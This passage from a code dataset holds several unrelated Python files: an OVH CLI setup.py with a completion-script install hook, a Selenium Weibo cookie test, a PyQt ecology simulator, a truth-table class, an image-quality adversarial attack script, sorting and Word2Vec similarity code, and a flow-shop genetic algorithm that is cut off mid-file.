support.timing():\n print(compute(f.read()))\n\n return 0\n\n\nif __name__ == '__main__':\n raise SystemExit(main())","repo_name":"bejoinka/aoc2022","sub_path":"day16/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72250679593","text":"import os\nimport re\nimport codecs\n\nfrom setuptools import setup, find_packages\nfrom setuptools.command.install import install\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts):\n return codecs.open(os.path.join(here, *parts), 'r').read()\n\n\ndef find_version(*file_paths):\n version_file = read(*file_paths)\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n version_file, re.M)\n if version_match:\n return version_match.group(1)\n raise RuntimeError(\"Unable to find version string.\")\n\n\ndef install_completion_script():\n import os\n has_bash = False\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n 
exe_file = os.path.join(path, 'bash')\n if os.path.isfile(exe_file) and os.access(exe_file, os.X_OK):\n has_bash = True\n\n if not has_bash:\n if os.system('complete') != 0:\n print('\\033[93mWarning: you do not have \"complete\" command, '\n 'the completion feature won\\'t be installed.\\033[0m')\n else:\n print('\\033[93mWarning: \"bash\" not found, the completion feature won\\'t be installed.\\033[0m')\n return\n\n if not os.path.isdir('/etc'):\n print('\\033[93mWarning: you do not have an unix environment, I cannot install the completion script.'\n 'Please install it manually by copying ovhcli_complete.sh to the correct folder '\n 'so it is executed at startup.\\033[0m')\n return\n\n if not os.path.isdir('/etc/bash_completion.d'):\n print('\\033[93mWarning: you do not have a \"/etc/bash_completion.d\" folder, the completion script will not '\n 'be installed. If you want to activate it, source ovhcli_complete.sh.\\033[0m')\n return\n\n with open('/etc/bash_completion.d/ovhcli', 'w+') as f:\n f.write(read('ovhcli_complete.sh'))\n\n try:\n os.chmod('/etc/bash_completion.d/ovhcli', 0o644)\n except OSError:\n pass\n print('\\033[94mOVH CLI completion script installed at \"/etc/bash_completion.d/ovhcli\".\\n'\n 'You will need to reload your shell or source it to activate the script.\\033[0m')\n\n\nclass PostInstallCommand(install):\n def run(self):\n install_completion_script()\n install.run(self)\n\nsetup(\n name=\"ovh_api_cli\",\n version=find_version(\"ovh_api_cli\", \"__init__.py\"),\n description=\"A wrapper over OVH's API with killer autocomplete feature.\",\n long_description=read('README.rst'),\n classifiers=[\n \"Topic :: Utilities\",\n \"Environment :: Console\",\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n ],\n keywords='ovh cli api apiv6',\n author='Cyril DEMINGEON',\n author_email='cyril.demingeon@corp.ovh.com',\n url='https://api.ovh.com/',\n license='MIT',\n packages=find_packages(),\n include_package_data=True,\n package_data={\n 'data': ['README.md', 'ovhcli_complete.sh', '*.py']\n },\n entry_points={\n \"console_scripts\": [\n \"ovhcli=ovh_api_cli:main\"\n ],\n },\n cmdclass={\n 'install': PostInstallCommand,\n }\n)\n","repo_name":"cyrbil/OVH-API-CLI","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32585147442","text":"import json\nimport pprint\nimport time\nimport yaml\n\nfrom selenium import webdriver\n\n\n\n\nclass Test():\n def setup_class(self):\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--start-maximized')\n self.driver = webdriver.Chrome(chrome_options=chrome_options)\n # self.driver.get(\"https://weibo.com/brawenfire/home\")\n self.driver.implicitly_wait(5)\n time.sleep(15)\n\n def teardown_class(self):\n print(\"访问结束\")\n self.driver.quit()\n #\n def test_getcookies(self):\n time.sleep(3)\n cookies = self.driver.get_cookies()\n # jsoncookies = json.dumps(cookies,indent=True,sort_keys=4) 不能用这个格式再存,直接用yaml,或者json.dumps然后 f.write(jsonCookies)\n pprint.pprint(cookies)\n with open (\"weibo.yaml\",\"w\") as 
f:\n yaml.dump(cookies,f)\n pprint.pprint(cookies)\n\n def test_login(self):\n self.driver.get(r\"https://weibo.com/\")\n time.sleep(4)\n with open(r\"weibo.yaml\",encoding=\"utf-8\") as f:\n cookies = yaml.safe_load(f)\n print(cookies)\n for c in cookies:\n self.driver.add_cookie(c)\n self.driver.refresh()\n time.sleep(5)\n print(\"登陆成功\")","repo_name":"Brawenlu/pytestproject","sub_path":"Pytest/test_loginwebbo.py","file_name":"test_loginwebbo.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2033765645","text":"PI = 3.14159\nlinha1 = input()\ndados1 = linha1.split()\n\na = dados1[0]\nb = dados1[1]\nc = dados1[2]\n\ntriangulo = (float(a) * float(c)) / 2\ncirculo = float(c) ** 2 * PI\ntrapezio = (float(a) + float(b)) * float(c) / 2\nquadrado = float(b) ** 2\nretangulo = float(a) * float(b)\n\nprint(\"TRIANGULO:\", format(triangulo, \".3f\"))\nprint(\"CIRCULO:\", format(circulo, \".3f\"))\nprint(\"TRAPEZIO:\", format(trapezio, \".3f\"))\nprint(\"QUADRADO:\", format(quadrado, \".3f\"))\nprint(\"RETANGULO:\", format(retangulo, \".3f\"))","repo_name":"viniielopes/uri","sub_path":"iniciante/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6602980726","text":"from PyQt5.Qt import QWidget, QColor, QPixmap, QIcon, QSize, QCheckBox\nfrom PyQt5.QtWidgets import QHBoxLayout, QVBoxLayout, QPushButton, QSplitter, \\\n QComboBox, QLabel, QSpinBox, QFileDialog\nfrom PaintBoard import PaintBoard\n\nclass MainWidget(QWidget):\n def __init__(self, Parent=None):\n super().__init__(Parent)\n self.__InitData() # 先初始化数据,再初始化界面\n self.__InitView()\n\n # 初始化成员变量\n def __InitData(self):\n self.__paintBoard = PaintBoard(self)\n\n # 初始化界面\n def __InitView(self):\n self.setFixedSize(640, 480)\n self.setWindowTitle(\"生态模拟仿真系统\")\n\n # 新建一个水平布局作为本窗体的主布局\n main_layout = QHBoxLayout(self)\n # 设置主布局内边距以及控件间距为10px\n main_layout.setSpacing(10)\n # 在主界面左侧放置动画显示界面\n main_layout.addWidget(self.__paintBoard)\n # 新建垂直子布局用于放置按键\n sub_layout = QVBoxLayout()\n # 设置此子布局和内部控件的间距为10px\n sub_layout.setContentsMargins(10, 10, 10, 10)\n\n # 添加文字和按钮\n # 设置小草数量\n self.__label_Grass = QLabel(self)\n self.__label_Grass.setText(\"小草数量\")\n self.__label_Grass.setFixedHeight(20)\n sub_layout.addWidget(self.__label_Grass) # 文字\n\n self.__spinBox_Grass = QSpinBox(self)\n self.__spinBox_Grass.setMaximum(35) # 最大值为35\n self.__spinBox_Grass.setMinimum(2) # 最小值为2\n self.__spinBox_Grass.setValue(10) # 默认数值为10\n self.__spinBox_Grass.setSingleStep(2) # 最小变化值为2\n self.__spinBox_Grass.valueChanged.connect(self.on_GrassNumChange) # 关联spinBox值变化信号和函数on_GrassNumChange\n sub_layout.addWidget(self.__spinBox_Grass) # 下拉选择框\n\n # 设置大型植物数量\n self.__label_Macrophyte = QLabel(self)\n self.__label_Macrophyte.setText(\"大型植物数量\")\n self.__label_Macrophyte.setFixedHeight(20)\n sub_layout.addWidget(self.__label_Macrophyte)\n\n self.__spinBox_Macrophyte = QSpinBox(self)\n self.__spinBox_Macrophyte.setMaximum(25)#最大值为25\n self.__spinBox_Macrophyte.setMinimum(5)#最小值为5\n self.__spinBox_Macrophyte.setValue(5) # 默认数值为5\n self.__spinBox_Macrophyte.setSingleStep(2) # 最小变化值为2\n self.__spinBox_Macrophyte.valueChanged.connect(self.on_MacrophyteNumChange)\n sub_layout.addWidget(self.__spinBox_Macrophyte)\n\n # 设置兔子数量\n self.__label_Rabbit = QLabel(self)\n self.__label_Rabbit.setText(\"兔子数量\")\n self.__label_Rabbit.setFixedHeight(20)\n 
sub_layout.addWidget(self.__label_Rabbit)\n\n self.__spinBox_Rabbit = QSpinBox(self)\n self.__spinBox_Rabbit.setMaximum(15)#最大值为15\n self.__spinBox_Rabbit.setMinimum(0)#最小值为0\n self.__spinBox_Rabbit.setValue(1) # 默认数值为1\n self.__spinBox_Rabbit.setSingleStep(1) # 最小变化值为1\n self.__spinBox_Rabbit.valueChanged.connect(self.on_RabbitNumChange)\n sub_layout.addWidget(self.__spinBox_Rabbit)\n\n # 设置蛇数量\n self.__label_Snake = QLabel(self)\n self.__label_Snake.setText(\"蛇数量\")\n self.__label_Snake.setFixedHeight(20)\n sub_layout.addWidget(self.__label_Snake)\n\n self.__spinBox_Snake = QSpinBox(self)\n self.__spinBox_Snake.setMaximum(15)#最大值15\n self.__spinBox_Snake.setMinimum(0)#最小值0\n self.__spinBox_Snake.setValue(1) # 默认数值为1\n self.__spinBox_Snake.setSingleStep(1) # 最小变化值为1\n self.__spinBox_Snake.valueChanged.connect(self.on_SnakeNumChange)\n sub_layout.addWidget(self.__spinBox_Snake)\n\n # 设置老虎数量\n self.__label_Tiger = QLabel(self)\n self.__label_Tiger.setText(\"老虎数量\")\n self.__label_Tiger.setFixedHeight(20)\n sub_layout.addWidget(self.__label_Tiger)\n\n self.__spinBox_Tiger = QSpinBox(self)\n self.__spinBox_Tiger.setMaximum(10)\n self.__spinBox_Tiger.setMinimum(0)\n self.__spinBox_Tiger.setValue(1) # 默认数值为1\n self.__spinBox_Tiger.setSingleStep(1) # 最小变化值为1\n self.__spinBox_Tiger.valueChanged.connect(self.on_TigerNumChange)\n sub_layout.addWidget(self.__spinBox_Tiger)\n\n # 确定按钮\n self.__btn_Sure = QPushButton(\"确定\")\n self.__btn_Sure.setParent(self) # 设置父对象为本界面\n self.__btn_Sure.clicked.connect(self.__paintBoard.Print)# 关联button点击事件和函数Print\n sub_layout.addWidget(self.__btn_Sure)\n\n # 清空按钮\n self.__btn_Clear = QPushButton(\"清空\")\n self.__btn_Clear.setParent(self) # 设置父对象为本界面\n self.__btn_Clear.clicked.connect(self.__paintBoard.Clear)\n sub_layout.addWidget(self.__btn_Clear)\n\n # 退出按钮\n self.__btn_Quit = QPushButton(\"退出\")\n self.__btn_Quit.setParent(self) # 设置父对象为本界面\n self.__btn_Quit.clicked.connect(self.Quit)\n sub_layout.addWidget(self.__btn_Quit)\n\n main_layout.addLayout(sub_layout) # 将子布局加入主布局\n\n # 获取设置后的生物数量\n def on_GrassNumChange(self):\n GrassNum = self.__spinBox_Grass.value()\n self.__paintBoard.GrassNumChange(GrassNum)\n\n def on_MacrophyteNumChange(self):\n MacrophyteNum = self.__spinBox_Macrophyte.value()\n self.__paintBoard.MacrophyteNumChange(MacrophyteNum)\n\n def on_RabbitNumChange(self):\n RabbitNum = self.__spinBox_Rabbit.value()\n self.__paintBoard.RabbitNumChange(RabbitNum)\n\n def on_SnakeNumChange(self):\n SnakeNum = self.__spinBox_Snake.value()\n self.__paintBoard.SnakeNumChange(SnakeNum)\n\n def on_TigerNumChange(self):\n TigerNum = self.__spinBox_Tiger.value()\n self.__paintBoard.TigerNumChange(TigerNum)\n\n # 退出\n def Quit(self):\n self.close()\n","repo_name":"zpp3668/Ecological-Simulation-System","sub_path":"test/ex-clock/MainWidget.py","file_name":"MainWidget.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"72361536233","text":"#coding=utf-8\n#城市P99 2017.4.17\ncities = {\n\t'beiJing':{\n\t\t'country':'China',\n\t\t'fact':'capital',\n\t\t},\n\t'newYork':{\n\t\t'country':'America',\n\t\t'fact':'economicalCity',\n\t\t},\n\t'oxford':{\n\t\t'country':'britain',\n\t\t'fact':'educationCity',\n\t\t}\n\t}\ncities['luoshan']={\n\t'country':'China',\n\t'fact':'myHometown',\n}\ndel cities['newYork']\nfor cityName,cityInfo in 
cities.items():\n\tprint('cityName:'+cityName.title())\n\tprint('country:'+cityInfo['country'])\n\tprint('fact:'+cityInfo['fact'].title()+'\\n')\n","repo_name":"jercas/PythonCrashCourse","sub_path":"LearningCode/6_11_cities.py","file_name":"6_11_cities.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13679752205","text":"from typing import Iterable, Union\nfrom .repr import PseudoBoolFunc\nfrom .utils import iter_assignments\nimport copy\n\nclass Table(PseudoBoolFunc):\n MUST_ALWAYS_BE_BOOLEAN = False\n\n def __init__(self, table: list[int], vars: list[str], print_mode=\"primes\"):\n super().__init__()\n self.__table = table\n self.__vars = vars\n self.__print_mode = print_mode\n assert 2**len(self.vars) == len(self.__table)\n\n def set_print_mode(self, mode):\n assert mode in [\"table\", \"primes\"]\n self.__print_mode = mode\n\n def __getitem__(self, key):\n return self.__table[self.assignment2idx(key)]\n\n def __hash__(self): \n return tuple(self.__table).__hash__() + tuple(self.vars).__hash__()\n\n def __copy__(self): \n return Table(self.__table.copy(), self.vars.copy())\n\n @property\n def is_boolean(self):\n return all(c in [0,1] for c in self.__table)\n\n @property\n def vars(self) -> Iterable[str]: \n return self.__vars\n\n def cofactor(self, ass: dict[str, bool]) -> \"Table\": \n new_vars = [x for x in self.vars if x not in ass]\n table = Table.zeros(new_vars)\n for u in iter_assignments(new_vars):\n table[u] = self[u | ass]\n return table\n\n def flip(self, S: Union[str, set[str]]) -> \"Table\": \n if isinstance(S,str): S = {S}\n table = copy.copy(self)\n for ass in iter_assignments(self.vars):\n table[ass] = self[ass | { x: not ass[x] for x in S }]\n return table\n \n @classmethod\n @property\n def false(cls) -> \"Table\": \n return Table([False], [])\n\n @classmethod\n @property\n def true(cls) -> \"Table\": \n return Table([True], [])\n\n @classmethod\n def _apply(cls, op: str, *children) -> \"Table\":\n assert all( isinstance(c,PseudoBoolFunc) or isinstance(c,float) or isinstance(c,int) for c in children ) \n all_vars = list( set().union( *(set(c.vars) for c in children if isinstance(c, PseudoBoolFunc) )) ) \n new_table = Table.zeros(all_vars)\n children_are_boolean = all(c.is_boolean if isinstance(c,PseudoBoolFunc) else c in [0,1] for c in children)\n for ass in iter_assignments(all_vars):\n vals = [ c[ass] if isinstance(c, PseudoBoolFunc) else c for c in children ]\n val = None\n if op == \"+\": val = vals[0]+vals[1]\n elif op == \"-\": val = -vals[0]\n elif op == \"*\": val = vals[0]*vals[1]\n elif op == \"**\": val = vals[0]**vals[1]\n elif op == \"abs\": val = abs(vals[0])\n elif children_are_boolean:\n if op == \"~\": val = not vals[0]\n elif op == \"&\": val = vals[0] and vals[1]\n elif op == \"|\": val = vals[0] or vals[1]\n elif op == \"^\": val = vals[0] != vals[1]\n elif op == \"->\": val = not vals[0] or vals[1]\n elif op == \"<-\": val = vals[0] or not vals[1]\n elif op == \"<->\": val = vals[0] == vals[1]\n else: raise Exception(f\"operation {op} not applicable if all operands are Boolean functions.\")\n else: raise Exception(f\"operation {op} not applicable.\")\n new_table[ass] = val\n return new_table\n\n @classmethod\n def var(cls, x: str) -> \"Table\":\n return Table([False, True], [x])\n\n def expectation(self) -> float:\n return sum(self.__table) / 2**len(self.vars)\n\n # --- END ABSTRACT METHODS ---\n\n def replace(self, d: dict[str, str]):\n 
cpy_vars = self.vars.copy()\n for idx in range(len(self.vars)):\n if self.vars[idx] in d:\n cpy_vars[idx] = d[self.vars[idx]]\n assert len(self.vars) == len(set(cpy_vars)), \"renaming must be a bijection!\"\n return Table(self.__table, cpy_vars)\n\n def __setitem__(self, key, val):\n if isinstance(key, dict): \n key = self.assignment2idx(key)\n self.__table[key] = val\n\n # def resort(self, new_vars: Iterable[str]) -> \"PseudoBoolFunc\":\n # assert set(new_vars) == set(self.vars)\n # cpy = copy.copy(self)\n # for ass in iter_assignments(new_vars):\n # cpy[ass] = self[ass]\n # return cpy\n\n def assignment2idx(self, assignment: dict[str, bool]) -> int:\n table_index = 0\n for idx in range(len(self.vars)):\n v = self.vars[len(self.vars)-idx-1]\n if assignment[v]: table_index += 2**idx\n return table_index\n\n def __repr__(self):\n if self.__print_mode == \"table\" or not self.is_boolean:\n ret = \" \".join(self.vars) + \" f\" + \"\\n\" + \"-\"*(len(self.vars)*2+1) \n for ass in iter_assignments(self.vars):\n ret += \"\\n\" + \" \".join({True: \"1\", False: \"0\"}[ass[x]] for x in self.vars)\n ret += f\" {float(self[ass]):.5}\"\n ret += \"\\n\"\n elif self.__print_mode == \"primes\":\n if self.expectation() == 0: return \"0\"\n elif self.expectation() == 1: return \"1\"\n primes = self.prime_implicants()\n ret = \" | \".join(\"\".join(k if v else k+\"'\" for k,v in p.items()) for p in primes)\n else:\n raise Exception(f\"print_mode must either be 'primes' or 'table' but is {self.__print_mode}.\")\n return ret\n\n @classmethod\n def zeros(cls, vars: list[str]) -> \"Table\":\n return Table([0 for _ in range(2**len(vars))], vars)\n","repo_name":"graps1/impmeas","sub_path":"impmeas/representation/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28502876068","text":"# LAZY IMPORT\nimport os\nimport sys\ncur_dir = os.path.dirname(__file__)\nmaster_dir = os.path.join(\"..\", cur_dir)\nsys.path.append(master_dir)\n##############################\n\n\nfrom pixel_privacy.models.biqa_model import BIQAModel\nfrom pixel_privacy.attacks.simple_white_box import SimpleWhiteBox\n\n\n\nif __name__ == \"__main__\":\n weight_path = \"../../2020-Pixel-Privacy-Task-master/BIQA_model/KonCept512.pth\"\n image_path = \"../../2020-Pixel-Privacy-Task-master/pp2020_test/Places365_val_00015483.png\"\n\n model = BIQAModel(weight_path, pretrained=None)\n print(\"Inited model\")\n attack = SimpleWhiteBox()\n\n attack.attack_binary(\n model,\n image_path,\n device=\"cuda\",\n lr=1e-2,\n )\n","repo_name":"cin-xing/pixel_privacy_2020","sub_path":"scripts/test_attack.py","file_name":"test_attack.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73248813354","text":"def merge(a, b):\n n, m = len(a), len(b)\n i, j = 0, 0\n c = []\n while (i < n or j < m):\n if (j == m or (i < n and a[i] < b[j])):\n c.append(a[i])\n i += 1\n else:\n c.append(b[j])\n j += 1\n return c\n\ndef sort(a):\n n = len(a)\n if (n <= 1):\n return a\n al = a[:(n//2)]\n ar = a[(n//2):]\n al, ar = sort(al), sort(ar)\n return merge(al, ar)\n\na = []\nn = int(input())\nel = list(map(int, input().split()))\nfor i in range(n):\n a.append(el[i])\n\na = sort(a)\n\nfor i in a:\n print(i, end = ' 
')","repo_name":"priamoryki/ITMO","sub_path":"semester-1/algo/Lab-1/TaskA.py","file_name":"TaskA.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4748355028","text":"#-*- coding:utf-8 -*-\n# sklearn을 사용한 코사인 유사도 측정\n\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom gensim.models import Word2Vec\nfrom konlpy.tag import Mecab\nimport numpy as np\nimport re\n\ndata_sentence =['구성 및 특성\\r\\n시스템폼은 기본적으로 2개 이상의 브라켓 유니트로 이루어져 있다. 상부 작업대(0레벨) 중간작업대(-1레벨), 하부작업대(-2레벨), 거푸집 및 콘��리트 타설용 발판(+1레벨)로 구성되어 있다.\\r\\n상부작업대(0레벨)은 거푸집 아래에 있는 작업발판이고 클라이밍 시스템의 메인 크로스빔이 있는 0레벨 발판이며 거푸집 해체·설치가 이루어진다.\\r\\n중간작업대(-1레벨)는 거푸집의 인양작업 발판이고 하부작업대(-2레벨)는 거푸집 인양 후 슈(Shoe) 제거작업, 마감작업 등을 위한 발판이고 +1레벨 발판을 통상적으로 콘크리트 타설용으로 거푸집에 설치되어 있다.\\r\\nRCS 레일은 보통 2개 이상의 클라이밍 레일로 이루어져 있고 각각의 레일은 클라이밍 레일 커플링으로 연결되어 -1레벨의 헤비 듀티 스핀들을 이용해서 거푸집 인양을 위한 각도를 조절할 수 있다.\\r\\n모든 브라켓유니트가 연결된 클라이밍 레일은 M20볼트에 의해 클라이밍 슈 걸림쇠에 지지되며 클라이밍 슈는 월슈 또는 슬라브슈에 연결되어 하중 을 전달하고 월슈 및 슬라브슈는 M24볼트나 M30볼트로 콘크리트 타설시 미리 매립되어 있는 클라이밍 콘과 타이로드, 앵커플레이트에 연결되어 하중을 구조체로 전달한다.\\r\\n시스템폼의 모든 구성 부재 및 부속품은 제작사의 정품을 사용하고 안전성을 확인 하여야 한다. ']\n\ncorpuses = []\nfor sentence in data_sentence:\n corpuses.append(sentence)\nprint(corpuses, len(corpuses))\n\n\n# 1. input 문장의 token화\n# 한 줄의 문장이 들어가는 것을 가정\ndef meacb_tokenizer(corpuses):\n corpuses =[ re.sub(r'[^ ㄱ-ㅣ가-힣A-Za-z]', '', corpus) for corpus in corpuses] # 특수기호, 한자 제거\n mecab = Mecab(dicpath=r\"C:/mecab/mecab-ko-dic\")\n # answer = [mecab.nouns(corpuses)]\n answer = []\n for corpus in corpuses:\n temp =[]\n for token in mecab.nouns(corpus):\n temp.append(token)\n answer.append(temp)\n return answer\n\n\n# 2. input의 단어벡터 생성\n# vector_size, window, sg만 설정. 나머지는 defult값 사용\ninput_word2vec_model = Word2Vec.load('Models/word2vec_model/final_data_mecab_ing_word2vec.model')\n\n# 3. 
input의 문장벡터 생성\ndef makeFeatureVec(words, model, num_features):\n # 속도를 위해 0으로 채운 배열로 초기화 한다.\n featureVec = np.zeros((num_features,),dtype=\"float32\")\n\n nwords = 0.\n # Index2word는 모델의 사전에 있는 단어명을 담은 리스트이다.\n corpus_index2word = model.wv.index_to_key\n # 루프를 돌며 모델 사전에 포함이 되는 단어라면 피처에 추가한다.\n for word in words:\n #print(word)\n if word in corpus_index2word:\n nwords = nwords + 1.\n #print(np.add(featureVec,model.wv[word]))\n featureVec = np.add(featureVec,model.wv[word])\n # 결과를 단어수로 나누어 평균을 구한다.\n print(featureVec.shape, nwords)\n\n featureVec = np.divide(featureVec,nwords)\n \n return featureVec\n\n\nsentence_vector = np.empty(shape=(300,1), dtype='float32')\nmodel = Word2Vec.load('Models/word2vec_model/final_data_mecab_ing_word2vec.model')\nfor sentence in meacb_tokenizer(corpuses):\n \n sentence_vector = np.add(sentence_vector,makeFeatureVec(sentence, model, 300))\nsentence_vector = np.transpose(sentence_vector)\n# 저장되어 있는 sentence_vector 불러오기\nvector_case600 = np.load('C:/Users/김민주/project/Safety_Helmet/Models/sentence_vector/case600_sentence_vector.npy')\nvector_case10000 = np.load('C:/Users/김민주/project/Safety_Helmet/Models/sentence_vector/case10000_sentence_vector.npy')\nvector_GJ = np.load('C:/Users/김민주/project/Safety_Helmet/Models/sentence_vector/GJ_sentence_vector.npy')\n\nprint(sentence_vector.shape)\nprint(vector_case600.shape)\nprint(vector_case10000.dtype)\nprint(vector_GJ.dtype)\n\n# 각각의 sentence_vector와 코사인 유사도 실행\ncosine_sim_600 = cosine_similarity(sentence_vector, vector_case600)\ncosine_sim_10000 = cosine_similarity(sentence_vector, vector_case10000)\ncosine_sim_GJ = cosine_similarity(sentence_vector, vector_GJ)\n\n\n# 유사도에 따라 문장들 정렬?\n# sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n\n# 가장 유사한 --개의 문장 받아오기\n# sim_scores = sim_scores[1:11]\n\n\n# vector_to_id?\n","repo_name":"ai-castlemoney/Safety_Helmet","sub_path":"10. 
Models/calculate_cosine_similarity.py","file_name":"calculate_cosine_similarity.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"72220736873","text":"import pandas as pd\nimport numpy as np\nimport random as rd\nimport sklearn\nimport xlrd\n\ndf = pd.read_excel('data.xlsx')\nnp.set_printoptions(suppress=True)\n\ndf = df.to_numpy()\ntasks = df.shape[0]\nnumber_of_machines = df.shape[1]\ndf_start = df.copy()\n\n\ndef calculate(arr):\n first_row = arr[0, 0:number_of_machines]\n w = 0\n row_sum = np.array([])\n for j in first_row:\n if w == 0:\n row_sum = np.append(row_sum, j)\n elif w == 1:\n row_sum = np.append(row_sum, j)\n elif w < number_of_machines + 1:\n row_sum = np.append(row_sum, j + row_sum[w - 1])\n w = w + 1\n result = row_sum\n\n if arr.ndim > 1:\n row_before = result\n number_of_tasks = arr.shape[0]\n df_copy = arr[1:number_of_tasks, 0:number_of_machines]\n n = 0\n for i in df_copy:\n row_add = np.array([])\n for k in i:\n if n == 0:\n row_add = np.append(row_add, k)\n elif n == 1:\n row_add = np.append(row_add, k + row_before[1])\n elif n < number_of_machines + 1:\n add = max(row_add[n - 1], row_before[n]) + k\n row_add = np.append(row_add, add)\n else:\n pass\n n = n + 1\n if n == number_of_machines:\n n = 0\n row_before = row_add.copy()\n result = np.vstack([result, row_add])\n return result\n\n\ndef generate_pop(population_size):\n list_of_pop = np.array([])\n for i in range(population_size):\n osobnik = np.random.choice(np.arange(0, tasks), tasks, replace=False)\n if i == 0:\n list_of_pop = np.append(list_of_pop, osobnik)\n else:\n list_of_pop = np.vstack([list_of_pop, osobnik])\n return list_of_pop\n\n\ndef osobnik_cal(data, indeks_order):\n indeks_order = indeks_order.astype(np.int64)\n data = data.take(indeks_order, axis=0)\n res = calculate(data)[-1][-1]\n return res\n\n\ndef tournament(data, population):\n best_pop = np.array([])\n\n for i in range(len(population)):\n random_osob = np.random.choice(np.arange(0, len(population)), 2, replace=False)\n osobnik1 = population[random_osob[0]]\n score1 = osobnik_cal(data, osobnik1)\n osobnik2 = population[random_osob[1]]\n score2 = osobnik_cal(data, osobnik2)\n if score1 < score2:\n if len(best_pop) == 0:\n best_pop = osobnik1\n else:\n best_pop = np.vstack([best_pop, osobnik1])\n else:\n if len(best_pop) == 0:\n best_pop = osobnik2\n else:\n best_pop = np.vstack([best_pop, osobnik2])\n\n return best_pop\n\n\ndef rank_roulette(data, population):\n scores = np.array([])\n for i in range(len(population)):\n data_start = data\n offspring_score = osobnik_cal(data_start, population[i])\n scores = np.append(scores, offspring_score)\n\n scores_sort = np.argsort(scores)\n population = population[scores_sort]\n\n marks = np.arange(1, len(population) + 1)\n sum_marks = np.sum(marks)\n prob = np.sort(marks / sum_marks)[::-1]\n index = np.arange(len(population))\n\n roulette = np.random.choice(index, size=len(population), replace=True, p=prob)\n selected_population = population[roulette]\n\n return selected_population\n\n\ndef crossover(parents):\n offsprings = np.array([])\n for i in range(int(len(parents) / 2)):\n parent1 = parents[i]\n parent2 = parents[len(parents) - 1 - i]\n len1 = int(parent1.shape[0] / 2)\n offspring1 = parent1[0:len1]\n for i in parent2:\n if i in offspring1:\n pass\n else:\n offspring1 = np.append(offspring1, i)\n if len(offsprings) == 0:\n offsprings = offspring1\n else:\n offsprings = 
np.vstack([offsprings, offspring1])\n\n offspring2 = parent2[0:len1]\n for i in parent1:\n if i in offspring2:\n pass\n else:\n offspring2 = np.append(offspring2, i)\n\n offsprings = np.vstack([offsprings, offspring2])\n\n return offsprings\n\n\ndef order_crossover(parents):\n number1 = np.random.randint(len(parents))\n number2 = np.random.randint(len(parents))\n offsprings = np.array([])\n for i in range(int(len(parents)/2)):\n if number1 <= number2:\n offspring1 = parents[i, number1:number2]\n offspring2 = parents[len(parents) - i - 1, number1:number2]\n start_len = len(parents) - number2\n start_len2 = len(parents) - number2\n add_order_offspring1 = parents[len(parents) - i - 1, number2:]\n add_order_offspring1 = np.append(add_order_offspring1, parents[len(parents) - i - 1, 0:number2])\n add_order_offspring2 = parents[i, number2:]\n add_order_offspring2 = np.append(add_order_offspring2, parents[i, 0:number2])\n else:\n offspring1 = parents[i, number2:number1]\n offspring2 = parents[len(parents) - i - 1, number2:number1]\n start_len = len(parents) - number1\n start_len2 = len(parents) - number1\n add_order_offspring1 = parents[len(parents) - i - 1, number1:]\n add_order_offspring1 = np.append(add_order_offspring1, parents[len(parents) - i - 1, 0:number1])\n add_order_offspring2 = parents[i, number1:]\n add_order_offspring2 = np.append(add_order_offspring2, parents[i, 0:number1])\n\n for j in add_order_offspring1:\n if j not in offspring1:\n if start_len > 0:\n offspring1 = np.append(offspring1, j)\n start_len = start_len - 1\n else:\n offspring1 = np.insert(offspring1, 0, j)\n if len(offsprings) == 0:\n offsprings = offspring1\n else:\n offsprings = np.vstack([offsprings, offspring1])\n\n for j in add_order_offspring2:\n if j not in offspring2:\n if start_len2 > 0:\n offspring2 = np.append(offspring2, j)\n start_len2 = start_len2 - 1\n else:\n offspring2 = np.insert(offspring2, 0, j)\n offsprings = np.vstack([offsprings, offspring2])\n\n return offsprings\n\n\ndef mutate(offspring_array):\n for i in range(len(offspring_array)):\n if rd.random() >= 0.95:\n rand1, rand2 = np.random.choice(np.arange(0, tasks), 2, replace=False)\n offspring_array[i, [rand1, rand2]] = offspring_array[i, [rand2, rand1]]\n\n return offspring_array\n\n\ndef save_best(population_array, data):\n data_copy = data.copy()\n first = True\n for i in population_array:\n data = data_copy\n score = osobnik_cal(data, i)\n if first:\n best_score = score\n best_order = i\n first = False\n elif (score < best_score):\n best_score = score\n best_order = i\n\n return best_order, score\n\n\npop = generate_pop(100)\nfor i in 